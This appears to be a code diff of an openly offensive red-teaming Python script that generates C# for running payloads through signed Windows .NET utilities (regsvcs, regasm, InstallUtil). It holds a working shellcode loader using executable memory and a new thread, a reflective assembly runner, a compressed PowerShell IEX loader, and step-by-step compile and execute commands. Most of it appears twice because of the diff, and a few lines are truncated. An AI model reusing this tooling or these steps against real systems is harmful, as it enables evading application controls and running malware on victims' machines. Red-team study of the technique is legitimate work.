'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - - Step 2: Compile source code: - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs - - Step 3: Execute your payload! - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll -*/ - -namespace Program -{ - public class Bypass : ServicedComponent - { - public Bypass() - { - } - - // This executes if registration is successful - [ComRegisterFunction] - public static void RegisterClass( string key ) - { - Shellcode.Execute(); - } - - // This executes if registration fails - [ComUnregisterFunction] - public static void UnRegisterClass( string key ) - { - Shellcode.Execute(); - } - } - - [System.ComponentModel.RunInstaller(true)] - public class ForInstallUtil : System.Configuration.Install.Installer - { - // This executes during InstallUtil /U invocation - public override void Uninstall(System.Collections.IDictionary savedState) - { - Shellcode.Execute(); - } - } - - public class Shellcode - { - $launchCode - } -}''').safe_substitute( - launchCode = launchCode, - usings = usings - ) - - return template - -def detectFileIsExe(filePath, forced = False): - first1000 = [] - - with open(filePath, 'rb') as f: - first1000 = f.read()[:1000] - - if not (first1000[0] == 'M' and first1000[1] == 'Z'): - return False - - elfanew = struct.unpack(' - -''') - if len(argv) < 2: - print('Usage: ./generateRogueDotNet.py ') - sys.exit(-1) - - args = opts(argv) - - _format = 'powershell' - - if args.exe: - if not detectFileIsExe(args.inputFile, args.exe): - sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') - return False - - _format = 'exe' - sys.stderr.write('[+] File recognized as PE/EXE.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - elif args.raw: - _format = 'raw' - sys.stderr.write('[+] File specified as raw Shellcode.\n\n') - with open(args.inputFile, 'rb') as f: - payload = f.read() - - else: - sys.stderr.write('[+] Powershell code given.\n') - - if args.inputFile.endswith('.exe'): - return False - - payload = getCompressedPayload(args.inputFile) - - output = getSourceFileContents(payload, _format) - - print(output) - - management = '' - if _format == 'powershell': - management = ' /r:System.Management.Automation.dll' - - commands = ''' - -===================================== -NEXT STEPS: - -Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) - - $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' - $Content = [System.Convert]::FromBase64String($key) - Set-Content key.snk -Value $Content -Encoding Byte - -Step 2: Compile source code: - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs - -Step 3: Execute your payload! - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll - %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll - - %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll - %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll - '''.format(management) - - if 'PROGRAMFILES(X86)' in os.environ: - commands = commands.replace('Framework', 'Framework64') - - sys.stderr.write(commands) - -if __name__ == '__main__': - main(sys.argv) +#!/usr/bin/python3 +# +# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique. +# +# Step 1: Generate source code file +# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs +# +# Step 2: Compilate library .NET Assembly +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used +# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). +# Then proper compilation command will be: +# +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs +# +# Step 3: Code execution via Regsvcs, Regasm or InstallUtil: +# x86: +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# x64: +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll + +# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# +# Mariusz B. / mgeeky, +# + +import re +import os +import io +import sys +import gzip +import base64 +import string +import struct +import random +import binascii +import argparse + + +def getCompressedPayload(filePath): + out = io.BytesIO() + encoded = '' + with open(filePath, 'rb') as f: + inp = f.read() + + with gzip.GzipFile(fileobj = out, mode = 'w') as fo: + fo.write(inp) + + encoded = base64.b64encode(out.getvalue()) + + powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( + encoded.decode() + ) + return powershell + +def getSourceFileContents(payload, _format): + launchCode = '' + usings = '' + + if _format == 'exe': + + exeLaunchCode = string.Template(''' + public static void Execute() { + + string payload = "$payload2"; + byte[] decoded = System.Convert.FromBase64String(payload); + + Assembly asm = Assembly.Load(decoded); + MethodInfo method = asm.EntryPoint; + object instance = asm.CreateInstance(method.Name); + method.Invoke(instance, null); + + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + + launchCode = exeLaunchCode + + elif _format == 'raw': + + foo = str(binascii.hexlify(payload), 'ascii') + fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] + encodedPayload = ' ' + + for i in range(len(fooarr)): + if i % 16 == 0 and i > 0: + encodedPayload += '\n ' + encodedPayload += '{}, '.format(fooarr[i]) + + encodedPayload = encodedPayload.strip()[:-1] + + shellcodeLoader = string.Template(''' + [DllImport("kernel32")] + private static extern IntPtr VirtualAlloc( + IntPtr lpAddress, UIntPtr dwSize, + UInt32 flAllocationType, + UInt32 flProtect + ); + + [DllImport("kernel32")] + private static extern bool VirtualFree( + IntPtr lpAddress, + UInt32 dwSize, + UInt32 dwFreeType + ); + + [DllImport("kernel32")] + private static extern IntPtr CreateThread( + UInt32 lpThreadAttributes, + UInt32 dwStackSize, + IntPtr lpStartAddress, + IntPtr param, + UInt32 dwCreationFlags, + ref UInt32 lpThreadId + ); + + [DllImport("kernel32")] + private static extern bool CloseHandle( + IntPtr hHandle + ); + + [DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject( + IntPtr hHandle, + UInt32 dwMilliseconds + ); + + private static UInt32 MEM_COMMIT = 0x1000; + private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; + private static UInt32 MEM_RELEASE = 0x8000; + + public static void Execute() { + + byte[] payload = new byte[$payloadSize] { + $payload2 + }; + + IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + Marshal.Copy(payload, 0, funcAddr, payload.Length); + IntPtr hThread = IntPtr.Zero; + UInt32 threadId = 0; + + hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId); + WaitForSingleObject(hThread, 0xFFFFFFFF); + + CloseHandle(hThread); + VirtualFree(funcAddr, 0, MEM_RELEASE); + + }''').safe_substitute( + payload2 = encodedPayload, + payloadSize = len(payload) + ) + + launchCode = shellcodeLoader + + else: + usings += ''' +using System.Management.Automation; +using System.Management.Automation.Runspaces; +''' + powershellLaunchCode = string.Template(''' + public static void Execute() { + + byte[] payload = System.Convert.FromBase64String("$payload2"); + string decoded = System.Text.Encoding.UTF8.GetString(payload); + + Runspace runspace = RunspaceFactory.CreateRunspace(); + runspace.Open(); + + Pipeline pipeline = runspace.CreatePipeline(); + pipeline.Commands.AddScript(decoded); + pipeline.Invoke(); + + runspace.Close(); + }''').safe_substitute( + payload2 = base64.b64encode(payload.encode()).decode() + ) + + launchCode = powershellLaunchCode + + + template = string.Template(''' +using System; +using System.Diagnostics; +using System.Reflection; +using System.Runtime.InteropServices; +using System.EnterpriseServices; +$usings + +/* + Author: Casey Smith, Twitter: @subTee + Customized by: Mariusz B. / mgeeky, + License: BSD 3-Clause + + Step 1: Create Your Strong Name Key -> key.snk + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + + Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs + + Step 3: Execute your payload! + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +# %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll +*/ + +namespace Program +{ + public class Bypass : ServicedComponent + { + public Bypass() + { + } + + // This executes if registration is successful + [ComRegisterFunction] + public static void RegisterClass( string key ) + { + Shellcode.Execute(); + } + + // This executes if registration fails + [ComUnregisterFunction] + public static void UnRegisterClass( string key ) + { + Shellcode.Execute(); + } + } + + [System.ComponentModel.RunInstaller(true)] + public class ForInstallUtil : System.Configuration.Install.Installer + { + // This executes during InstallUtil /U invocation + public override void Uninstall(System.Collections.IDictionary savedState) + { + Shellcode.Execute(); + } + } + + public class Shellcode + { + $launchCode + } +}''').safe_substitute( + launchCode = launchCode, + usings = usings + ) + + return template + +def detectFileIsExe(filePath, forced = False): + first1000 = [] + + with open(filePath, 'rb') as f: + first1000 = f.read()[:1000] + + if not (first1000[0] == 'M' and first1000[1] == 'Z'): + return False + + elfanew = struct.unpack(' + +''') + if len(argv) < 2: + print('Usage: ./generateRogueDotNet.py ') + sys.exit(-1) + + args = opts(argv) + + _format = 'powershell' + + if args.exe: + if not detectFileIsExe(args.inputFile, args.exe): + sys.stderr.write('[-] File not recognized as PE/EXE.\n\n') + return False + + _format = 'exe' + sys.stderr.write('[+] File recognized as PE/EXE.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + elif args.raw: + _format = 'raw' + sys.stderr.write('[+] File specified as raw Shellcode.\n\n') + with open(args.inputFile, 'rb') as f: + payload = f.read() + + else: + sys.stderr.write('[+] Powershell code given.\n') + + if args.inputFile.endswith('.exe'): + return False + + payload = getCompressedPayload(args.inputFile) + + output = getSourceFileContents(payload, _format) + + print(output) + + management = '' + if _format == 'powershell': + management = ' /r:System.Management.Automation.dll' + + commands = ''' + +===================================== +NEXT STEPS: + +Step 1: Create Your Strong Name Key -> key.snk (or use the one provided in this directory) + + $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' + $Content = [System.Convert]::FromBase64String($key) + Set-Content key.snk -Value $Content -Encoding Byte + +Step 2: Compile source code: + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs + +Step 3: Execute your payload! + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll + %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll + + %WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + %WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll + '''.format(management) + + if 'PROGRAMFILES(X86)' in os.environ: + commands = commands.replace('Framework', 'Framework64') + + sys.stderr.write(commands) + +if __name__ == '__main__': + main(sys.argv)